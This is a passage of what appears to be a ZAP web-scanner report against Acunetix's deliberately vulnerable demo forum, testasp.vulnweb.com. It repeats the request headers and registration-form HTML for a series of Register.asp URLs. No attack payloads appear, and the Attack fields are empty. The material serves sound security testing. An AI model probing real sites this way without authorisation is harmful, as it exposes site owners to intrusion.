method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" 